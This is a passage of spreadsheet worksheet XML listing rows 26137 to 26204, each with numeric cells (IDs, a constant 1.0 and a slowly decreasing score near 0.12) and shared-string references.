        <v>25130</v>
      </c>
      <c r="D26137" s="2">
        <v>1.0</v>
      </c>
      <c r="E26137" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26137" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="26138" ht="15.75" customHeight="1">
      <c r="A26138" s="1">
        <v>8538.0</v>
      </c>
      <c r="B26138" s="2">
        <v>5.4128044E7</v>
      </c>
      <c r="C26138" s="2" t="s">
        <v>25131</v>
      </c>
      <c r="D26138" s="2">
        <v>1.0</v>
      </c>
      <c r="E26138" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26138" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26139" ht="15.75" customHeight="1">
      <c r="A26139" s="1">
        <v>11567.0</v>
      </c>
      <c r="B26139" s="2">
        <v>2.2760321E7</v>
      </c>
      <c r="C26139" s="2" t="s">
        <v>25132</v>
      </c>
      <c r="D26139" s="2">
        <v>1.0</v>
      </c>
      <c r="E26139" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26139" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26140" ht="15.75" customHeight="1">
      <c r="A26140" s="1">
        <v>17842.0</v>
      </c>
      <c r="B26140" s="2">
        <v>5.0948792E7</v>
      </c>
      <c r="C26140" s="2" t="s">
        <v>25133</v>
      </c>
      <c r="D26140" s="2">
        <v>1.0</v>
      </c>
      <c r="E26140" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26140" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26141" ht="15.75" customHeight="1">
      <c r="A26141" s="1">
        <v>18566.0</v>
      </c>
      <c r="B26141" s="2">
        <v>5.3194367E7</v>
      </c>
      <c r="C26141" s="2" t="s">
        <v>25134</v>
      </c>
      <c r="D26141" s="2">
        <v>1.0</v>
      </c>
      <c r="E26141" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26141" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26142" ht="15.75" customHeight="1">
      <c r="A26142" s="1">
        <v>22675.0</v>
      </c>
      <c r="B26142" s="2">
        <v>4.1766705E7</v>
      </c>
      <c r="C26142" s="2" t="s">
        <v>25135</v>
      </c>
      <c r="D26142" s="2">
        <v>1.0</v>
      </c>
      <c r="E26142" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26142" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26143" ht="15.75" customHeight="1">
      <c r="A26143" s="1">
        <v>31335.0</v>
      </c>
      <c r="B26143" s="2">
        <v>4976390.0</v>
      </c>
      <c r="C26143" s="2" t="s">
        <v>25136</v>
      </c>
      <c r="D26143" s="2">
        <v>1.0</v>
      </c>
      <c r="E26143" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26143" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26144" ht="15.75" customHeight="1">
      <c r="A26144" s="1">
        <v>33168.0</v>
      </c>
      <c r="B26144" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C26144" s="2" t="s">
        <v>25137</v>
      </c>
      <c r="D26144" s="2">
        <v>1.0</v>
      </c>
      <c r="E26144" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26144" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="26145" ht="15.75" customHeight="1">
      <c r="A26145" s="1">
        <v>2725.0</v>
      </c>
      <c r="B26145" s="2">
        <v>3.4957965E7</v>
      </c>
      <c r="C26145" s="2" t="s">
        <v>25138</v>
      </c>
      <c r="D26145" s="2">
        <v>1.0</v>
      </c>
      <c r="E26145" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26145" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26146" ht="15.75" customHeight="1">
      <c r="A26146" s="1">
        <v>5565.0</v>
      </c>
      <c r="B26146" s="2">
        <v>4.6001263E7</v>
      </c>
      <c r="C26146" s="2" t="s">
        <v>25139</v>
      </c>
      <c r="D26146" s="2">
        <v>1.0</v>
      </c>
      <c r="E26146" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26146" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26147" ht="15.75" customHeight="1">
      <c r="A26147" s="1">
        <v>6625.0</v>
      </c>
      <c r="B26147" s="2">
        <v>4.9059703E7</v>
      </c>
      <c r="C26147" s="2" t="s">
        <v>25140</v>
      </c>
      <c r="D26147" s="2">
        <v>1.0</v>
      </c>
      <c r="E26147" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26147" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26148" ht="15.75" customHeight="1">
      <c r="A26148" s="1">
        <v>8341.0</v>
      </c>
      <c r="B26148" s="2">
        <v>5.3715638E7</v>
      </c>
      <c r="C26148" s="2" t="s">
        <v>25141</v>
      </c>
      <c r="D26148" s="2">
        <v>1.0</v>
      </c>
      <c r="E26148" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26148" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26149" ht="15.75" customHeight="1">
      <c r="A26149" s="1">
        <v>14147.0</v>
      </c>
      <c r="B26149" s="2">
        <v>3.7960016E7</v>
      </c>
      <c r="C26149" s="2" t="s">
        <v>25142</v>
      </c>
      <c r="D26149" s="2">
        <v>1.0</v>
      </c>
      <c r="E26149" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26149" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26150" ht="15.75" customHeight="1">
      <c r="A26150" s="1">
        <v>15506.0</v>
      </c>
      <c r="B26150" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C26150" s="2" t="s">
        <v>25143</v>
      </c>
      <c r="D26150" s="2">
        <v>1.0</v>
      </c>
      <c r="E26150" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26150" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26151" ht="15.75" customHeight="1">
      <c r="A26151" s="1">
        <v>16771.0</v>
      </c>
      <c r="B26151" s="2">
        <v>4.7685143E7</v>
      </c>
      <c r="C26151" s="2" t="s">
        <v>25144</v>
      </c>
      <c r="D26151" s="2">
        <v>1.0</v>
      </c>
      <c r="E26151" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26151" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26152" ht="15.75" customHeight="1">
      <c r="A26152" s="1">
        <v>22473.0</v>
      </c>
      <c r="B26152" s="2">
        <v>3679364.0</v>
      </c>
      <c r="C26152" s="2" t="s">
        <v>25145</v>
      </c>
      <c r="D26152" s="2">
        <v>1.0</v>
      </c>
      <c r="E26152" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26152" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26153" ht="15.75" customHeight="1">
      <c r="A26153" s="1">
        <v>33604.0</v>
      </c>
      <c r="B26153" s="2">
        <v>8340295.0</v>
      </c>
      <c r="C26153" s="2" t="s">
        <v>25146</v>
      </c>
      <c r="D26153" s="2">
        <v>1.0</v>
      </c>
      <c r="E26153" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26153" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26154" ht="15.75" customHeight="1">
      <c r="A26154" s="1">
        <v>33963.0</v>
      </c>
      <c r="B26154" s="2">
        <v>9349301.0</v>
      </c>
      <c r="C26154" s="2" t="s">
        <v>25147</v>
      </c>
      <c r="D26154" s="2">
        <v>1.0</v>
      </c>
      <c r="E26154" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26154" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="26155" ht="15.75" customHeight="1">
      <c r="A26155" s="1">
        <v>5817.0</v>
      </c>
      <c r="B26155" s="2">
        <v>4.6850894E7</v>
      </c>
      <c r="C26155" s="2" t="s">
        <v>25148</v>
      </c>
      <c r="D26155" s="2">
        <v>1.0</v>
      </c>
      <c r="E26155" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26155" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26156" ht="15.75" customHeight="1">
      <c r="A26156" s="1">
        <v>6065.0</v>
      </c>
      <c r="B26156" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C26156" s="2" t="s">
        <v>25149</v>
      </c>
      <c r="D26156" s="2">
        <v>1.0</v>
      </c>
      <c r="E26156" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26156" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26157" ht="15.75" customHeight="1">
      <c r="A26157" s="1">
        <v>8838.0</v>
      </c>
      <c r="B26157" s="2">
        <v>5.4676811E7</v>
      </c>
      <c r="C26157" s="2" t="s">
        <v>25150</v>
      </c>
      <c r="D26157" s="2">
        <v>1.0</v>
      </c>
      <c r="E26157" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26157" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26158" ht="15.75" customHeight="1">
      <c r="A26158" s="1">
        <v>8882.0</v>
      </c>
      <c r="B26158" s="2">
        <v>5.4776386E7</v>
      </c>
      <c r="C26158" s="2" t="s">
        <v>25151</v>
      </c>
      <c r="D26158" s="2">
        <v>1.0</v>
      </c>
      <c r="E26158" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26158" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26159" ht="15.75" customHeight="1">
      <c r="A26159" s="1">
        <v>12354.0</v>
      </c>
      <c r="B26159" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C26159" s="2" t="s">
        <v>25152</v>
      </c>
      <c r="D26159" s="2">
        <v>1.0</v>
      </c>
      <c r="E26159" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26159" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26160" ht="15.75" customHeight="1">
      <c r="A26160" s="1">
        <v>15343.0</v>
      </c>
      <c r="B26160" s="2">
        <v>4.2614387E7</v>
      </c>
      <c r="C26160" s="2" t="s">
        <v>25153</v>
      </c>
      <c r="D26160" s="2">
        <v>1.0</v>
      </c>
      <c r="E26160" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26160" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26161" ht="15.75" customHeight="1">
      <c r="A26161" s="1">
        <v>15576.0</v>
      </c>
      <c r="B26161" s="2">
        <v>4.3439333E7</v>
      </c>
      <c r="C26161" s="2" t="s">
        <v>25154</v>
      </c>
      <c r="D26161" s="2">
        <v>1.0</v>
      </c>
      <c r="E26161" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26161" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26162" ht="15.75" customHeight="1">
      <c r="A26162" s="1">
        <v>19146.0</v>
      </c>
      <c r="B26162" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C26162" s="2" t="s">
        <v>25155</v>
      </c>
      <c r="D26162" s="2">
        <v>1.0</v>
      </c>
      <c r="E26162" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26162" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26163" ht="15.75" customHeight="1">
      <c r="A26163" s="1">
        <v>20187.0</v>
      </c>
      <c r="B26163" s="2">
        <v>1.0503539E7</v>
      </c>
      <c r="C26163" s="2" t="s">
        <v>25156</v>
      </c>
      <c r="D26163" s="2">
        <v>1.0</v>
      </c>
      <c r="E26163" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26163" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26164" ht="15.75" customHeight="1">
      <c r="A26164" s="1">
        <v>20405.0</v>
      </c>
      <c r="B26164" s="2">
        <v>1.2207464E7</v>
      </c>
      <c r="C26164" s="2" t="s">
        <v>25157</v>
      </c>
      <c r="D26164" s="2">
        <v>1.0</v>
      </c>
      <c r="E26164" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26164" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26165" ht="15.75" customHeight="1">
      <c r="A26165" s="1">
        <v>22347.0</v>
      </c>
      <c r="B26165" s="2">
        <v>3.4560577E7</v>
      </c>
      <c r="C26165" s="2" t="s">
        <v>25158</v>
      </c>
      <c r="D26165" s="2">
        <v>1.0</v>
      </c>
      <c r="E26165" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26165" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26166" ht="15.75" customHeight="1">
      <c r="A26166" s="1">
        <v>22597.0</v>
      </c>
      <c r="B26166" s="2">
        <v>3.9458279E7</v>
      </c>
      <c r="C26166" s="2" t="s">
        <v>25159</v>
      </c>
      <c r="D26166" s="2">
        <v>1.0</v>
      </c>
      <c r="E26166" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26166" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26167" ht="15.75" customHeight="1">
      <c r="A26167" s="1">
        <v>22906.0</v>
      </c>
      <c r="B26167" s="2">
        <v>4.8156175E7</v>
      </c>
      <c r="C26167" s="2" t="s">
        <v>25160</v>
      </c>
      <c r="D26167" s="2">
        <v>1.0</v>
      </c>
      <c r="E26167" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26167" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26168" ht="15.75" customHeight="1">
      <c r="A26168" s="1">
        <v>23392.0</v>
      </c>
      <c r="B26168" s="2">
        <v>5.5731581E7</v>
      </c>
      <c r="C26168" s="2" t="s">
        <v>25161</v>
      </c>
      <c r="D26168" s="2">
        <v>1.0</v>
      </c>
      <c r="E26168" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26168" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26169" ht="15.75" customHeight="1">
      <c r="A26169" s="1">
        <v>23535.0</v>
      </c>
      <c r="B26169" s="2">
        <v>5942496.0</v>
      </c>
      <c r="C26169" s="2" t="s">
        <v>25162</v>
      </c>
      <c r="D26169" s="2">
        <v>1.0</v>
      </c>
      <c r="E26169" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26169" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26170" ht="15.75" customHeight="1">
      <c r="A26170" s="1">
        <v>24937.0</v>
      </c>
      <c r="B26170" s="2">
        <v>1.2481636E7</v>
      </c>
      <c r="C26170" s="2" t="s">
        <v>25163</v>
      </c>
      <c r="D26170" s="2">
        <v>1.0</v>
      </c>
      <c r="E26170" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26170" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26171" ht="15.75" customHeight="1">
      <c r="A26171" s="1">
        <v>25326.0</v>
      </c>
      <c r="B26171" s="2">
        <v>1.3467936E7</v>
      </c>
      <c r="C26171" s="2" t="s">
        <v>25164</v>
      </c>
      <c r="D26171" s="2">
        <v>1.0</v>
      </c>
      <c r="E26171" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26171" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26172" ht="15.75" customHeight="1">
      <c r="A26172" s="1">
        <v>25521.0</v>
      </c>
      <c r="B26172" s="2">
        <v>1.4210372E7</v>
      </c>
      <c r="C26172" s="2" t="s">
        <v>25165</v>
      </c>
      <c r="D26172" s="2">
        <v>1.0</v>
      </c>
      <c r="E26172" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26172" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26173" ht="15.75" customHeight="1">
      <c r="A26173" s="1">
        <v>25526.0</v>
      </c>
      <c r="B26173" s="2">
        <v>1.4221037E7</v>
      </c>
      <c r="C26173" s="2" t="s">
        <v>25166</v>
      </c>
      <c r="D26173" s="2">
        <v>1.0</v>
      </c>
      <c r="E26173" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26173" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26174" ht="15.75" customHeight="1">
      <c r="A26174" s="1">
        <v>26367.0</v>
      </c>
      <c r="B26174" s="2">
        <v>1.6881607E7</v>
      </c>
      <c r="C26174" s="2" t="s">
        <v>25167</v>
      </c>
      <c r="D26174" s="2">
        <v>1.0</v>
      </c>
      <c r="E26174" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26174" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26175" ht="15.75" customHeight="1">
      <c r="A26175" s="1">
        <v>26381.0</v>
      </c>
      <c r="B26175" s="2">
        <v>1.6978794E7</v>
      </c>
      <c r="C26175" s="2" t="s">
        <v>25168</v>
      </c>
      <c r="D26175" s="2">
        <v>1.0</v>
      </c>
      <c r="E26175" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26175" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26176" ht="15.75" customHeight="1">
      <c r="A26176" s="1">
        <v>26901.0</v>
      </c>
      <c r="B26176" s="2">
        <v>1.9283007E7</v>
      </c>
      <c r="C26176" s="2" t="s">
        <v>25169</v>
      </c>
      <c r="D26176" s="2">
        <v>1.0</v>
      </c>
      <c r="E26176" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26176" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26177" ht="15.75" customHeight="1">
      <c r="A26177" s="1">
        <v>27520.0</v>
      </c>
      <c r="B26177" s="2">
        <v>2.2167347E7</v>
      </c>
      <c r="C26177" s="2" t="s">
        <v>25170</v>
      </c>
      <c r="D26177" s="2">
        <v>1.0</v>
      </c>
      <c r="E26177" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26177" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26178" ht="15.75" customHeight="1">
      <c r="A26178" s="1">
        <v>27958.0</v>
      </c>
      <c r="B26178" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C26178" s="2" t="s">
        <v>25171</v>
      </c>
      <c r="D26178" s="2">
        <v>1.0</v>
      </c>
      <c r="E26178" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26178" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26179" ht="15.75" customHeight="1">
      <c r="A26179" s="1">
        <v>28166.0</v>
      </c>
      <c r="B26179" s="2">
        <v>2.4933012E7</v>
      </c>
      <c r="C26179" s="2" t="s">
        <v>25172</v>
      </c>
      <c r="D26179" s="2">
        <v>1.0</v>
      </c>
      <c r="E26179" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26179" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26180" ht="15.75" customHeight="1">
      <c r="A26180" s="1">
        <v>28527.0</v>
      </c>
      <c r="B26180" s="2">
        <v>2.6757394E7</v>
      </c>
      <c r="C26180" s="2" t="s">
        <v>25173</v>
      </c>
      <c r="D26180" s="2">
        <v>1.0</v>
      </c>
      <c r="E26180" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26180" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26181" ht="15.75" customHeight="1">
      <c r="A26181" s="1">
        <v>29135.0</v>
      </c>
      <c r="B26181" s="2">
        <v>3.0542775E7</v>
      </c>
      <c r="C26181" s="2" t="s">
        <v>25174</v>
      </c>
      <c r="D26181" s="2">
        <v>1.0</v>
      </c>
      <c r="E26181" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26181" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26182" ht="15.75" customHeight="1">
      <c r="A26182" s="1">
        <v>29560.0</v>
      </c>
      <c r="B26182" s="2">
        <v>3.316521E7</v>
      </c>
      <c r="C26182" s="2" t="s">
        <v>25175</v>
      </c>
      <c r="D26182" s="2">
        <v>1.0</v>
      </c>
      <c r="E26182" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26182" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26183" ht="15.75" customHeight="1">
      <c r="A26183" s="1">
        <v>31068.0</v>
      </c>
      <c r="B26183" s="2">
        <v>4.8165181E7</v>
      </c>
      <c r="C26183" s="2" t="s">
        <v>25176</v>
      </c>
      <c r="D26183" s="2">
        <v>1.0</v>
      </c>
      <c r="E26183" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26183" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26184" ht="15.75" customHeight="1">
      <c r="A26184" s="1">
        <v>31433.0</v>
      </c>
      <c r="B26184" s="2">
        <v>5.0158111E7</v>
      </c>
      <c r="C26184" s="2" t="s">
        <v>25177</v>
      </c>
      <c r="D26184" s="2">
        <v>1.0</v>
      </c>
      <c r="E26184" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26184" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26185" ht="15.75" customHeight="1">
      <c r="A26185" s="1">
        <v>32956.0</v>
      </c>
      <c r="B26185" s="2">
        <v>6510403.0</v>
      </c>
      <c r="C26185" s="2" t="s">
        <v>25178</v>
      </c>
      <c r="D26185" s="2">
        <v>1.0</v>
      </c>
      <c r="E26185" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26185" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26186" ht="15.75" customHeight="1">
      <c r="A26186" s="1">
        <v>32982.0</v>
      </c>
      <c r="B26186" s="2">
        <v>6600461.0</v>
      </c>
      <c r="C26186" s="2" t="s">
        <v>25179</v>
      </c>
      <c r="D26186" s="2">
        <v>1.0</v>
      </c>
      <c r="E26186" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26186" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26187" ht="15.75" customHeight="1">
      <c r="A26187" s="1">
        <v>33055.0</v>
      </c>
      <c r="B26187" s="2">
        <v>6810869.0</v>
      </c>
      <c r="C26187" s="2" t="s">
        <v>25180</v>
      </c>
      <c r="D26187" s="2">
        <v>1.0</v>
      </c>
      <c r="E26187" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26187" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26188" ht="15.75" customHeight="1">
      <c r="A26188" s="1">
        <v>33237.0</v>
      </c>
      <c r="B26188" s="2">
        <v>7289601.0</v>
      </c>
      <c r="C26188" s="2" t="s">
        <v>25181</v>
      </c>
      <c r="D26188" s="2">
        <v>1.0</v>
      </c>
      <c r="E26188" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26188" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26189" ht="15.75" customHeight="1">
      <c r="A26189" s="1">
        <v>33436.0</v>
      </c>
      <c r="B26189" s="2">
        <v>7819613.0</v>
      </c>
      <c r="C26189" s="2" t="s">
        <v>25182</v>
      </c>
      <c r="D26189" s="2">
        <v>1.0</v>
      </c>
      <c r="E26189" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26189" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="26190" ht="15.75" customHeight="1">
      <c r="A26190" s="1">
        <v>31468.0</v>
      </c>
      <c r="B26190" s="2">
        <v>5044550.0</v>
      </c>
      <c r="C26190" s="2" t="s">
        <v>25183</v>
      </c>
      <c r="D26190" s="2">
        <v>1.0</v>
      </c>
      <c r="E26190" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26190" s="2">
        <v>0.1214285714285715</v>
      </c>
    </row>
    <row r="26191" ht="15.75" customHeight="1">
      <c r="A26191" s="1">
        <v>25619.0</v>
      </c>
      <c r="B26191" s="2">
        <v>1.4410118E7</v>
      </c>
      <c r="C26191" s="2" t="s">
        <v>25184</v>
      </c>
      <c r="D26191" s="2">
        <v>1.0</v>
      </c>
      <c r="E26191" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26191" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="26192" ht="15.75" customHeight="1">
      <c r="A26192" s="1">
        <v>28582.0</v>
      </c>
      <c r="B26192" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C26192" s="2" t="s">
        <v>25185</v>
      </c>
      <c r="D26192" s="2">
        <v>1.0</v>
      </c>
      <c r="E26192" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26192" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="26193" ht="15.75" customHeight="1">
      <c r="A26193" s="1">
        <v>10749.0</v>
      </c>
      <c r="B26193" s="2">
        <v>1.5469822E7</v>
      </c>
      <c r="C26193" s="2" t="s">
        <v>25186</v>
      </c>
      <c r="D26193" s="2">
        <v>1.0</v>
      </c>
      <c r="E26193" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26193" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="26194" ht="15.75" customHeight="1">
      <c r="A26194" s="1">
        <v>16063.0</v>
      </c>
      <c r="B26194" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C26194" s="2" t="s">
        <v>25187</v>
      </c>
      <c r="D26194" s="2">
        <v>1.0</v>
      </c>
      <c r="E26194" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26194" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="26195" ht="15.75" customHeight="1">
      <c r="A26195" s="1">
        <v>23126.0</v>
      </c>
      <c r="B26195" s="2">
        <v>5134327.0</v>
      </c>
      <c r="C26195" s="2" t="s">
        <v>25188</v>
      </c>
      <c r="D26195" s="2">
        <v>1.0</v>
      </c>
      <c r="E26195" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26195" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="26196" ht="15.75" customHeight="1">
      <c r="A26196" s="1">
        <v>28181.0</v>
      </c>
      <c r="B26196" s="2">
        <v>2.4995342E7</v>
      </c>
      <c r="C26196" s="2" t="s">
        <v>25120</v>
      </c>
      <c r="D26196" s="2">
        <v>1.0</v>
      </c>
      <c r="E26196" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26196" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="26197" ht="15.75" customHeight="1">
      <c r="A26197" s="1">
        <v>33307.0</v>
      </c>
      <c r="B26197" s="2">
        <v>7507791.0</v>
      </c>
      <c r="C26197" s="2" t="s">
        <v>25189</v>
      </c>
      <c r="D26197" s="2">
        <v>1.0</v>
      </c>
      <c r="E26197" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26197" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="26198" ht="15.75" customHeight="1">
      <c r="A26198" s="1">
        <v>16422.0</v>
      </c>
      <c r="B26198" s="2">
        <v>4.6311116E7</v>
      </c>
      <c r="C26198" s="2" t="s">
        <v>25190</v>
      </c>
      <c r="D26198" s="2">
        <v>1.0</v>
      </c>
      <c r="E26198" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26198" s="2">
        <v>0.1206597222222223</v>
      </c>
    </row>
    <row r="26199" ht="15.75" customHeight="1">
      <c r="A26199" s="1">
        <v>30988.0</v>
      </c>
      <c r="B26199" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C26199" s="2" t="s">
        <v>25191</v>
      </c>
      <c r="D26199" s="2">
        <v>1.0</v>
      </c>
      <c r="E26199" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26199" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="26200" ht="15.75" customHeight="1">
      <c r="A26200" s="1">
        <v>30132.0</v>
      </c>
      <c r="B26200" s="2">
        <v>3.6998292E7</v>
      </c>
      <c r="C26200" s="2" t="s">
        <v>25192</v>
      </c>
      <c r="D26200" s="2">
        <v>1.0</v>
      </c>
      <c r="E26200" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26200" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="26201" ht="15.75" customHeight="1">
      <c r="A26201" s="1">
        <v>30969.0</v>
      </c>
      <c r="B26201" s="2">
        <v>4.7481604E7</v>
      </c>
      <c r="C26201" s="2" t="s">
        <v>25122</v>
      </c>
      <c r="D26201" s="2">
        <v>1.0</v>
      </c>
      <c r="E26201" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26201" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="26202" ht="15.75" customHeight="1">
      <c r="A26202" s="1">
        <v>15290.0</v>
      </c>
      <c r="B26202" s="2">
        <v>4.2420876E7</v>
      </c>
      <c r="C26202" s="2" t="s">
        <v>25193</v>
      </c>
      <c r="D26202" s="2">
        <v>1.0</v>
      </c>
      <c r="E26202" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26202" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="26203" ht="15.75" customHeight="1">
      <c r="A26203" s="1">
        <v>22749.0</v>
      </c>
      <c r="B26203" s="2">
        <v>4.4422492E7</v>
      </c>
      <c r="C26203" s="2" t="s">
        <v>25194</v>
      </c>
      <c r="D26203" s="2">
        <v>1.0</v>
      </c>
      <c r="E26203" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26203" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="26204" ht="15.75" customHeight="1">
      <c r="A26204" s="1">
        <v>16164.0</v>
      </c>
      <c r="B26204" s="2">
        <v>4.5619667E7</v>
      </c>
      <c r="C26204" s="2" t="s">
        <v>25195</v>
      </c>
